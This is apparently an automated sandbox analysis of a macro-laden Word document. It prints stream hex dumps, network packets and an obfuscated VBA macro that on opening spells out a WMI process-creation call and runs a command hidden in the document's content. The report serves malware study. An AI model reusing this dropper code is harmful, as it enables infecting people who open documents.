                                                                    zImEIFI
                                                                    GKCGI
                                                                    HfUXFJwF
                                                                    Split(MtSXGFAwF,
                                                                    Array((LFmsHlGJO),
                                                                    Nkemmqfhxex
                                                                    OQtflfHc:
                                                                    LcJWChpF
                                                                    ndsns
                                                                    xdoxB
                                                                    GhFhH
                                                                    OAFQFBEFa()
                                                                    eFfcEAI
                                                                    vMqQFsCmr)
                                                                    OAFQFBEFa
                                                                    mQUInscCB
                                                                    xJhvfW
                                                                    Mid(Application.Name,
                                                                    ENgVDEnDI
                                                                    jbkkjHHCd
                                                                    VB_Name
                                                                    xJhvfW)
                                                                    Content
                                                                    xMeNBMA()
                                                                    QttEc
                                                                    TmgVHr
                                                                    BZLGJ)
                                                                    mbLvUI)
                                                                    SRadpEcF
                                                                    Function
                                                                    uHhldyVW
                                                                    Split(AnoeDGEY,
                                                                    Split(LXmiCH,
                                                                    auKzIlBI()
                                                                    BBnudDV
                                                                    qJJnPFoNQ
                                                                    AEpDpJGH
                                                                    zzXfBb
                                                                    bwTdFGH:
                                                                    Split(XfKDE,
                                                                    zImEIFI:
                                                                    UTUqCwyI
                                                                    rwAdJC
                                                                    rQMlbCDj
                                                                    cskzymBH:
                                                                    Array((QttEc),
                                                                    KDRcGw
                                                                    DJesE
                                                                    nd_ns
                                                                    rnfVw
                                                                    uQDVbE
                                                                    IcBqyoTE
                                                                    sInuFuLII
                                                                    Array((vXvXQH),
                                                                    LgSUu()
                                                                    iJkmJG
                                                                    Array((gPxXF),
                                                                    LcJWChpF:
                                                                    VlJBAxsF
                                                                    jKGrEhAE
                                                                    MNzdmO()
                                                                    mbLvUI
                                                                    jKGrEhAE()
                                                                    vQbVHTJ
                                                                    TQutDNlhF
                                                                    auKzIlBI
                                                                    wAZjcaDbE)
                                                                    LgSUu
                                                                    Split(zzXfBb,
                                                                    sInuFuLII)
                                                                    VZXgAzj
                                                                    Split(iJkmJG,
                                                                    TmgVHr()
                                                                    jbkkjHHCd)
                                                                    vXvXQH
                                                                    dmJpUJBT:
                                                                    Split(DpdIEHHc,
                                                                    HfUXFJwF()
                                                                    String:
                                                                    Array((huzCVaAnM),
                                                                    Array((OtpOArK),
                                                                    qJJnPFoNQ()
                                                                    TfZstIBWb
                                                                    skuwd
                                                                    eJIkEagfC)
                                                                    VBA Code
                                                                    Attribute VB_Name = "Gp0t5ucwnkng7fi"
Function Xusmagx95iuck_o3o()
   GoTo snBUla
    Const AjzpdH As String = "A"
    Const jbkkjHHCd As String = ","
    Const yqmFHJvF As String = "*high*,*critic*"
    Dim FwMLnnSxs As Range: Set FwMLnnSxs = Array((AjzpdH), Target)
    If FwMLnnSxs Is Nothing Then
    End If
    Dim rnfVw() As String: rnfVw = Split(yqmFHJvF, jbkkjHHCd)
snBUla:
skuwd = Nkemmqfhxex + U765y5vgf_ao0faq . Content + Dt5ebejo9lypr_3vmp
   GoTo uUNTnPDJ
    Const wPuUI As String = "A"
    Const QNBiBDJF As String = ","
    Const TfZstIBWb As String = "*high*,*critic*"
    Dim GyemVIEQ As Range: Set GyemVIEQ = Array((wPuUI), Target)
    If GyemVIEQ Is Nothing Then
    End If
    Dim kTIuCnPI() As String: kTIuCnPI = Split(TfZstIBWb, QNBiBDJF)
uUNTnPDJ:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
I8bgyvyef5pdaj7_v = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
   GoTo dtPsGEOG
    Const mQUInscCB As String = "A"
    Const PmHbFtBA As String = ","
    Const NxyDdD As String = "*high*,*critic*"
    Dim ENgVDEnDI As Range: Set ENgVDEnDI = Array((mQUInscCB), Target)
    If ENgVDEnDI Is Nothing Then
    End If
    Dim TmgVHr() As String: TmgVHr = Split(NxyDdD, PmHbFtBA)
dtPsGEOG:
A3hie1o1mwdgk_9_ = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
   GoTo bwTdFGH
    Const ZcbWFy As String = "A"
    Const jmprxcAGG As String = ","
    Const uwcdCFcFJ As String = "*high*,*critic*"
    Dim GhFhH As Range: Set GhFhH = Array((ZcbWFy), Target)
    If GhFhH Is Nothing Then
    End If
    Dim auKzIlBI() As String: auKzIlBI = Split(uwcdCFcFJ, jmprxcAGG)
bwTdFGH:
Bn1mqobqcygrsk1zn = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
   GoTo FCnAjUBF
    Const upIoDlhH As String = "A"
    Const BZLGJ As String = ","
    Const DpdIEHHc As String = "*high*,*critic*"
    Dim yifdCzUX As Range: Set yifdCzUX = Array((upIoDlhH), Target)
    If yifdCzUX Is Nothing Then
    End If
    Dim vmuBOT() As String: vmuBOT = Split(DpdIEHHc, BZLGJ)
FCnAjUBF:
Acbncig4c2s9p = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
   GoTo dmJpUJBT
    Const LFmsHlGJO As String = "A"
    Const VlJBAxsF As String = ","
    Const DReLBGD As String = "*high*,*critic*"
    Dim IUtVX As Range: Set IUtVX = Array((LFmsHlGJO), Target)
    If IUtVX Is Nothing Then
    End If
    Dim LgSUu() As String: LgSUu = Split(DReLBGD, VlJBAxsF)
dmJpUJBT:
C4s8ozri2fdnbsu4 = Bn1mqobqcygrsk1zn + Acbncig4c2s9p + A3hie1o1mwdgk_9_ + mjbBYHhbs + I8bgyvyef5pdaj7_v
   GoTo cskzymBH
    Const QttEc As String = "A"
    Const sInuFuLII As String = ","
    Const ybkwIF As String = "*high*,*critic*"
    Dim YYiqHCrBJ As Range: Set YYiqHCrBJ = Array((QttEc), Target)
    If YYiqHCrBJ Is Nothing Then
    End If
    Dim jEGWECK() As String: jEGWECK = Split(ybkwIF, sInuFuLII)
cskzymBH:
Eqhw188dzwgnq = Zr9iedzfw6nr(C4s8ozri2fdnbsu4)
   GoTo GKCGI
    Const JNPIBwzJy As String = "A"
    Const xJhvfW As String = ","
    Const MtSXGFAwF As String = "*high*,*critic*"
    Dim CtnVB As Range: Set CtnVB = Array((JNPIBwzJy), Target)
    If CtnVB Is Nothing Then
    End If
    Dim QFCSIz() As String: QFCSIz = Split(MtSXGFAwF, xJhvfW)
GKCGI:
Set Ixvxtuve66zxo = VBA.GetObject(Eqhw188dzwgnq)
   GoTo OQtflfHc
    Const vXvXQH As String = "A"
    Const BBnudDV As String = ","
    Const AnoeDGEY As String = "*high*,*critic*"
    Dim nUxeKfi As Range: Set nUxeKfi = Array((vXvXQH), Target)
    If nUxeKfi Is Nothing Then
    End If
    Dim LJgRGnI() As String: LJgRGnI = Split(AnoeDGEY, BBnudDV)
OQtflfHc:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Zr9iedzfw6nr(mxkikw)
   GoTo zImEIFI
    Const TYMfJE As String = "A"
    Const ppqanE As String = ","
    Const zzXfBb As String = "*high*,*critic*"
    Dim YXgZLBuTI As Range: Set YXgZLBuTI = Array((TYMfJE), Target)
    If YXgZLBuTI Is Nothing Then
    End If
    Dim qJJnPFoNQ() As String: qJJnPFoNQ = Split(zzXfBb, ppqanE)
zImEIFI:
Ixvxtuve66zxo.Create pqwm, S2xsub800b7, Tl85j6j2gy2n7qad
   GoTo LcJWChpF
    Const uFHXMGsDH As String = "A"
    Const wbcoCJA As String = ","
    Const UupSwG As String = "*high*,*critic*"
    Dim IfvyDH As Range: Set IfvyDH = Array((uFHXMGsDH), Target)
    If IfvyDH Is Nothing Then
    End If
    Dim HfUXFJwF() As String: HfUXFJwF = Split(UupSwG, wbcoCJA)
LcJWChpF:
End Function
Function Zr9iedzfw6nr(Pdkbu8b4a_ucmmy2)
On Error Resume Next
   GoTo XDCYoHErU
    Const OtpOArK As String = "A"
    Const mbLvUI As String = ","
    Const iJkmJG As String = "*high*,*critic*"
    Dim uHhldyVW As Range: Set uHhldyVW = Array((OtpOArK), Target)
    If uHhldyVW Is Nothing Then
    End If
    Dim OAFQFBEFa() As String: OAFQFBEFa = Split(iJkmJG, mbLvUI)
XDCYoHErU:
N21io7rxzal10t = Pdkbu8b4a_ucmmy2
   GoTo PDgjIDCIF
    Const vQbVHTJ As String = "A"
    Const SRadpEcF As String = ","
    Const mbdQXnNAJ As String = "*high*,*critic*"
    Dim ZhuxR As Range: Set ZhuxR = Array((vQbVHTJ), Target)
    If ZhuxR Is Nothing Then
    End If
    Dim xcFaA() As String: xcFaA = Split(mbdQXnNAJ, SRadpEcF)
PDgjIDCIF:
L4jc0swehya = Sotm_c8dqxel(N21io7rxzal10t)
   GoTo zPYsAGBC
    Const gPxXF As String = "A"
    Const vMqQFsCmr As String = ","
    Const IcBqyoTE As String = "*high*,*critic*"
    Dim UTUqCwyI As Range: Set UTUqCwyI = Array((gPxXF), Target)
    If UTUqCwyI Is Nothing Then
    End If
    Dim MNzdmO() As String: MNzdmO = Split(IcBqyoTE, vMqQFsCmr)
zPYsAGBC:
Zr9iedzfw6nr = L4jc0swehya
   GoTo mFRDA
    Const huzCVaAnM As String = "A"
    Const nmoAspl As String = ","
    Const AEpDpJGH As String = "*high*,*critic*"
    Dim EZSQT As Range: Set EZSQT = Array((huzCVaAnM), Target)
    If EZSQT Is Nothing Then
    End If
    Dim aEMwHJJ() As String: aEMwHJJ = Split(AEpDpJGH, nmoAspl)
mFRDA:
End Function
Function Sotm_c8dqxel(Tw8vu7dybjhd)
   GoTo eRlxboGG
    Const UrnhFG As String = "A"
    Const AeZXCL As String = ","
    Const LYEtDJDB As String = "*high*,*critic*"
    Dim MvCNCxeRC As Range: Set MvCNCxeRC = Array((UrnhFG), Target)
    If MvCNCxeRC Is Nothing Then
    End If
    Dim jqLUKf() As String: jqLUKf = Split(LYEtDJDB, AeZXCL)
eRlxboGG:
   GoTo DJesE
    Const bTSPCh As String = "A"
    Const eJIkEagfC As String = ","
    Const XfKDE As String = "*high*,*critic*"
    Dim eFfcEAI As Range: Set eFfcEAI = Array((bTSPCh), Target)
    If eFfcEAI Is Nothing Then
    End If
    Dim jKGrEhAE() As String: jKGrEhAE = Split(XfKDE, eJIkEagfC)
DJesE:
   GoTo xdoxB
    Const rlKxF As String = "A"
    Const TziQbRH As String = ","
    Const VVDiBADws As String = "*high*,*critic*"
    Dim nQutDRr As Range: Set nQutDRr = Array((rlKxF), Target)
    If nQutDRr Is Nothing Then
    End If
    Dim rQMlbCDj() As String: rQMlbCDj = Split(VVDiBADws, TziQbRH)
xdoxB:
Sotm_c8dqxel = Replace(Tw8vu7dybjhd, "ns w" + "u db nd", He0e1df114_gsl7i)
   GoTo VZXgAzj
    Const rwAdJC As String = "A"
    Const HzpNhFB As String = ","
    Const buaHCHyIN As String = "*high*,*critic*"
    Dim KJKIF As Range: Set KJKIF = Array((rwAdJC), Target)
    If KJKIF Is Nothing Then
    End If
    Dim xMeNBMA() As String: xMeNBMA = Split(buaHCHyIN, HzpNhFB)
VZXgAzj:
   GoTo XxDunFI
    Const SdueDATuJ As String = "A"
    Const wAZjcaDbE As String = ","
    Const TQutDNlhF As String = "*high*,*critic*"
    Dim ZtlVi As Range: Set ZtlVi = Array((SdueDATuJ), Target)
    If ZtlVi Is Nothing Then
    End If
    Dim yVlwI() As String: yVlwI = Split(TQutDNlhF, wAZjcaDbE)
XxDunFI:
   GoTo cCNkM
    Const SOBiDVBG As String = "A"
    Const uQDVbE As String = ","
    Const LXmiCH As String = "*high*,*critic*"
    Dim zgEErH As Range: Set zgEErH = Array((SOBiDVBG), Target)
    If zgEErH Is Nothing Then
    End If
    Dim KDRcGw() As String: KDRcGw = Split(LXmiCH, uQDVbE)
cCNkM:
End Function
                                                                    VBA File Name: Ht_h_pv5qq7taeoe3a, Stream Size: 705
                                                                    General
                                                                    Stream Path:Macros/VBA/Ht_h_pv5qq7taeoe3a
                                                                    VBA File Name:Ht_h_pv5qq7taeoe3a
                                                                    Stream Size:705
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 3c 11 fb 95 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    Attribute
                                                                    VB_Name
                                                                    VBA Code
                                                                    Attribute VB_Name = "Ht_h_pv5qq7taeoe3a"
                                                                    VBA File Name: U765y5vgf_ao0faq, Stream Size: 1173
                                                                    General
                                                                    Stream Path:Macros/VBA/U765y5vgf_ao0faq
                                                                    VBA File Name:U765y5vgf_ao0faq
                                                                    Stream Size:1173
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . n . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 3c 11 6e d2 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    False
                                                                    Private
                                                                    VB_Exposed
                                                                    Attribute
                                                                    VB_Name
                                                                    VB_Creatable
                                                                    Document_open()
                                                                    VB_PredeclaredId
                                                                    VB_GlobalNameSpace
                                                                    VB_Base
                                                                    VB_Customizable
                                                                    VB_TemplateDerived
                                                                    VBA Code
                                                                    Attribute VB_Name = "U765y5vgf_ao0faq"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Xusmagx95iuck_o3o
End Sub

                                                                    Streams

                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                    General
                                                                    Stream Path:\x1CompObj
                                                                    File Type:data
                                                                    Stream Size:146
                                                                    Entropy:4.00187355764
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 316
                                                                    General
                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                    File Type:data
                                                                    Stream Size:316
                                                                    Entropy:3.13931601016
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 0c 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520
                                                                    General
                                                                    Stream Path:\x5SummaryInformation
                                                                    File Type:data
                                                                    Stream Size:520
                                                                    Entropy:3.91439426516
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                                                    Stream Path: 1Table, File Type: data, Stream Size: 6885
                                                                    General
                                                                    Stream Path:1Table
                                                                    File Type:data
                                                                    Stream Size:6885
                                                                    Entropy:6.0189512257
                                                                    Base64 Encoded:True
                                                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                                    General
                                                                    Stream Path:Macros/PROJECT
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Stream Size:527
                                                                    Entropy:5.52643349927
                                                                    Base64 Encoded:True
                                                                    Data ASCII:I D = " { 3 4 8 2 5 3 8 1 - 3 9 1 5 - 4 2 D 7 - B C E B - D B 4 B F 3 B 3 B 9 D 0 } " . . D o c u m e n t = U 7 6 5 y 5 v g f _ a o 0 f a q / & H 0 0 0 0 0 0 0 0 . . M o d u l e = H t _ h _ p v 5 q q 7 t a e o e 3 a . . M o d u l e = G p 0 t 5 u c w n k n g 7 f i . . E x e N a m e 3 2 = " H n g q q _ v j w m d " . . N a m e = " $ $ " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 E 2 C C 8 F 6 4 8 3 E 2 8 4 2 2 8 4 2 2 8 4 2 2 8 4 2 "
                                                                    Data Raw:49 44 3d 22 7b 33 34 38 32 35 33 38 31 2d 33 39 31 35 2d 34 32 44 37 2d 42 43 45 42 2d 44 42 34 42 46 33 42 33 42 39 44 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 55 37 36 35 79 35 76 67 66 5f 61 6f 30 66 61 71 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 48 74 5f 68 5f 70 76 35 71 71 37 74 61 65 6f 65 33 61 0d 0a 4d 6f 64 75 6c 65 3d 47 70 30 74 35 75 63 77 6e 6b 6e
                                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 158
                                                                    General
                                                                    Stream Path:Macros/PROJECTwm
                                                                    File Type:data
                                                                    Stream Size:158
                                                                    Entropy:3.75971549021
                                                                    Base64 Encoded:False
                                                                    Data ASCII:U 7 6 5 y 5 v g f _ a o 0 f a q . U . 7 . 6 . 5 . y . 5 . v . g . f . _ . a . o . 0 . f . a . q . . . H t _ h _ p v 5 q q 7 t a e o e 3 a . H . t . _ . h . _ . p . v . 5 . q . q . 7 . t . a . e . o . e . 3 . a . . . G p 0 t 5 u c w n k n g 7 f i . G . p . 0 . t . 5 . u . c . w . n . k . n . g . 7 . f . i . . . . .
                                                                    Data Raw:55 37 36 35 79 35 76 67 66 5f 61 6f 30 66 61 71 00 55 00 37 00 36 00 35 00 79 00 35 00 76 00 67 00 66 00 5f 00 61 00 6f 00 30 00 66 00 61 00 71 00 00 00 48 74 5f 68 5f 70 76 35 71 71 37 74 61 65 6f 65 33 61 00 48 00 74 00 5f 00 68 00 5f 00 70 00 76 00 35 00 71 00 71 00 37 00 74 00 61 00 65 00 6f 00 65 00 33 00 61 00 00 00 47 70 30 74 35 75 63 77 6e 6b 6e 67 37 66 69 00 47 00 70 00
                                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4832
                                                                    General
                                                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                                                    File Type:data
                                                                    Stream Size:4832
                                                                    Entropy:5.49501263006
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 643
                                                                    General
                                                                    Stream Path:Macros/VBA/dir
                                                                    File Type:data
                                                                    Stream Size:643
                                                                    Entropy:6.34732268372
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . c . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                                                    Data Raw:01 7f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 be 63 fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                    Stream Path: WordDocument, File Type: data, Stream Size: 97248
                                                                    General
                                                                    Stream Path:WordDocument
                                                                    File Type:data
                                                                    Stream Size:97248
                                                                    Entropy:6.56028805033
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . b . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 f1 9a 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 e0 7b 01 00 62 7f 00 00 62 7f 00 00 f1 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                                    Stream Path: word, File Type: data, Stream Size: 435
                                                                    General
                                                                    Stream Path:word
                                                                    File Type:data
                                                                    Stream Size:435
                                                                    Entropy:7.51532274815
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . q . 8 N . . = . . . r . . 9 . n $ H . M . a . . . . v . / . . . . . . . z 3 . f . . . 5 . . } . Z + . J b . . . . { ` . . F . . . ] : 0 . . . . . H y . R . . . z . . . . . . . ; . . . . . . . . F ~ a . L . f 7 . . . 2 . . [ } . { . . . . . . " . . o . . . e . . . 0 . . - . 6 . # . . . V R ) . 2 V . . A s y . . V . . B . . . G 3 . * . . M . s . . . . > . . F s . X I . n . . . . . . @ . o . . . " . . . ] . r p I . [ . . . . . . . . l @ . . t . . v " 3 n @ Q 0 . | . H . . O . . % . Z A g . . .
                                                                    Data Raw:f2 dd 99 e7 92 11 fa 1f 71 ef 38 4e ee fa 3d f7 81 b1 72 fe 06 39 83 6e 24 48 ae 4d 84 61 e4 bc ee f8 76 f6 2f b8 fb 14 c3 d5 1f 8f 7a 33 c7 66 d4 ce 0e 35 be 2e 7d b9 5a 2b c3 4a 62 ac 9a 10 0a 7b 60 f5 83 46 c8 c8 b6 5d 3a 30 19 f4 f3 f0 80 48 79 b6 52 af fd bf 7a bd 9c 04 f5 b1 b2 17 3b 0f 84 ff d2 d1 e2 8e 05 46 7e 61 f3 4c 9f 66 37 d2 c9 1a 32 e4 bd 5b 7d a0 7b c6 a9 c4 d2 05

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 26, 2021 06:54:56.158967972 CET4916580192.168.2.22172.217.6.174
                                                                    Jan 26, 2021 06:54:56.288152933 CET8049165172.217.6.174192.168.2.22
